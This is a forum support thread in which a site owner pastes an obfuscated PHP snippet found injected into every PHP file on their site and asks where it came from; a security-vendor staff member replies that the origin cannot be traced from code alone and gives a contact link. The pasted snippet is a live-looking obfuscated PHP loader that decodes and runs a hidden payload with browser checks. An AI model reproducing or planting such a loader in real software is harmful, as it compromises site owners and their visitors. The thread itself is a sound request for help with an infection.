• Resolved wpdevart

    (@wpdevart)


    Hi dear team.

    We got this type of malware, this peace of code was added to every php file –

    <?php $zlerqbhc = ‘3]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!)!gj!|!*1?hmg%)!gj!<**2-4-bubE{ofuopdufhfmjg}[;ldpt%}K;ufldpt}X;ms;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c6<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyfx x22l:!}V;3q%}U;y]}R;2]7;!}6;##}C;!>>!}W;utpi}Y;tu!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmgM5]DgP5]D6#<%fdy>#]D4]27%)uqpuftmsvd},;uqpuftmsvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x748y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]585:6197g:74985-rr.93e:5597f-s.973:A x27pd%6<pd%w6Z6<.4hA x27pd%6<pd%w6Z6<.3hA x27pd%6<pd%w},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%hsbq%)323ldfidk!~!<**qvd}R;*msv%)}.;UQPMSVD!-idx24- x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 e:4:|:**#ppde#)tutjyf4 x223}!+!<+{e%+*!*+fepdfe{h+{7y]37]88y]27]28y]#/r%/h%)n%-#+I#)e>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26 ($_SERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 10%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv:.2^,%b:<!%c:>%s: x5c%j:^<!%w x5c^>Ew:Qb:Qc:W~!%z%)!gj!~<ofmy%,3,j%>j%!<**3x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2{6:!}*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5{66~6<]K4]65]D8]86]y31]278]y3f]2>j%!|!*#91y]c9y]g2y]#>>*4-7f_*#ujojRk3{666~6<&w6< judovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24I&b%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opop%!-uyfu%)3of)fepdof57ftidsbbj+upcotn+qsvmt+fmhpph#)zbscB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i {h%)j{hnpd!opjudovg!|!**#j{hnpd#)tut83:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#d/#)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x2yf x27*&7-n%)utjm6< x7fw6*CW&)7gd%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbu7 x45 116 x54″]); if ((strstr($uas,” x6d 163 x69 145″)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:569,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j7)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsun>qp%x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%t72]48y]#>m%:|:*r%:-t%)3of:op#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nb!>!%tdz)%bbT-%bT-%hW~%#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-7&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4{6~6<tfs%w6< x7fw6*CWtfsc1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5h3]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#np1-bubE{h%)sutcvt)!gj!|!*bubE x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOS%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cqs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf439275tJGB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:, $ehdgdom = implode(array_map("pvusfs27&6<*rfs%7-K)fujsxX6<#o]o]Y%<*QDUMPT7-NBFSUTLDPT7-UFO)) or (strstr($uas," x72 166 x3a 61 x31")) or (strst]D6M7]K3#<%yy>#]D6]281L1#/##C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.l} x27;%!<*#}_;#)323lmw!>!#]y84]275]y83]273]y76]277#<!usfsj($n){return chr(or7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]6dfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvuf6Z6<.2hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqdovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|sb!-#}#)fepmqnj!/!#0#)idubnhfsq)!sp!*#ojneb#-*f%)r($uas," x61 156 x64&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x2tfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppdfdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]25d816:+946:ce44#)zbssftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvuif((function_exists(" x6f 142 x5f 163 x74 141 x72 164- x24tvctus)% x24- x24b78]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]38w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%1]211M5]67]452]88]5]48]32M3]317]445]212]445]4%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:NmfV x7f<*XAZASV<*w%)ppdd($n)-1);} @error_reporting(0);]D2P4]D6#<%G]y6d]281Ldz-1H*WCw*[!%rN}#QwTW%hIr x58399#-!#65egb2dc#*<!sfuvso!sb1 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function pv<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f%)7gj6<*id%)ftpmdR6<*id%)dfyfRVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut><##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:759oepn)%epnbss-%rxW~!Ypp2)%));$mbmlllf = $esnyokx("", $ehdgdom); $mbmlllf();}}7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<j",str_split("%tjw!>!#]y84]275]y83]248]y83]j6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C xx5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr) 162 x6f 151 x64"))) { $esnyokx = " x63 162 x65 14tcpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{fth%)sutcvt)esp>hmg%!<1″) && (!isset($GLOBALS[” x61 156 x75 1q%:>:r%:|:**t%)m%=*h%)m%):fmjix:b!>!ssbnpe_GMFTQIQ&f_UTPIQUUI&e_SEEBFUPNFS&d_S8297f:5297e:56-xr.985:52985-t.98f;!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyfopjujyfopjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Zfs!~<3,j%>j%!*3! x27bc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5/!**#sfmcnbs+yfeobz+sfwjFSFGFSQUUI&c_UOFHBSFTVQUU56 x61″])))) { $GLOBALS[” x61 156 x75 156 x61″]=1; $uas=strtolower%z>3<!fmtf!%z>2<!%ww2)%wTW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-zB%z>! x24/%tmw/ x24)%zW%h>EzH,2W%wN;#-EcSFWSFT%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSiddlkhtu’; $yewvasnw=explode(chr((375-255)),substr($zlerqbhc,(38864-32938),(223-189))); $dajstlnv = $yewvasnw[0]($yewvasnw[(7-6)]); $aoplzhs = $yewvasnw[0]($yewvasnw[(8-6)]); if (!function_exists(‘ywvybrjs’)) { function ywvybrjs($pnfoabgofn, $zyxuph,$jberlvbk) { $zpckzk = NULL; for($nhkaxzyw=0;$nhkaxzyw<(sizeof($pnfoabgofn)/2);$nhkaxzyw++) { $zpckzk .= substr($zyxuph, $pnfoabgofn[($nhkaxzyw*2)],$pnfoabgofn[($nhkaxzyw*2)+(7-6)]); } return $jberlvbk(chr((52-43)),chr((490-398)),$zpckzk); }; } $kaaimrq = explode(chr((142-98)),’4112,53,5327,38,5695,66,1279,58,2120,53,3339,52,3878,20,5207,50,4545,59,3593,23,4436,31,3246,37,5067,43,2693,66,699,58,3727,64,2021,32,5110,61,3283,29,5010,57,1516,45,3312,27,3136,60,1166,67,3045,41,1337,55,1561,43,3898,40,2577,65,4729,30,2887,52,4759,45,1656,25,1468,48,386,27,82,39,911,26,553,63,5478,61,3791,37,4067,45,5584,20,4804,39,467,62,1442,26,1110,56,51,31,5306,21,1629,27,2859,28,1874,36,5539,45,4604,67,2822,37,1964,57,2264,57,3003,42,5643,24,1792,32,3828,50,4671,58,4046,21,5397,49,5667,28,1729,38,2467,48,890,21,1767,25,5604,39,5871,55,3539,21,3683,44,3086,50,3938,61,983,52,2053,67,5257,49,4413,23,1068,42,3482,57,325,61,757,66,121,41,2383,56,3560,33,2939,64,3616,67,1035,33,5365,32,4843,49,616,49,2439,28,1681,48,211,67,4165,23,413,54,1233,46,937,46,2321,62,4253,62,1824,50,5171,36,162,49,4516,29,4934,25,5831,40,4489,27,2642,51,2173,52,665,34,5446,32,1604,25,4892,42,1910,54,3391,27,529,24,2759,63,4467,22,823,67,2515,22,3999,47,4188,65,4315,45,0,30,30,21,4360,53,3196,50,2225,39,1392,50,278,47,5761,70,2537,40,3418,64,4959,51′); $svvzia = $dajstlnv(“”,ywvybrjs($kaaimrq,$zlerqbhc,$aoplzhs)); $dajstlnv=$zlerqbhc; $svvzia(“”); $svvzia=(376-255); $zlerqbhc=$svvzia-1; ?>

    We don’t know what is this.

    Can someone help us to find from where come this malware.

    Thanks in advance.

Viewing 1 replies (of 1 total)
  • Hi there,

    Unfortunately, it’s impossible to determine the origin from only a code sample. Also, as the forum here is only for plugin usage support, I’ll need to refer you to our contact page where you can report security issues to our Research Team. https://sucuri.net/company/contact-us

    Thanks!
    eve@sucuri

Viewing 1 replies (of 1 total)
  • The topic ‘Help Needed’ is closed to new replies.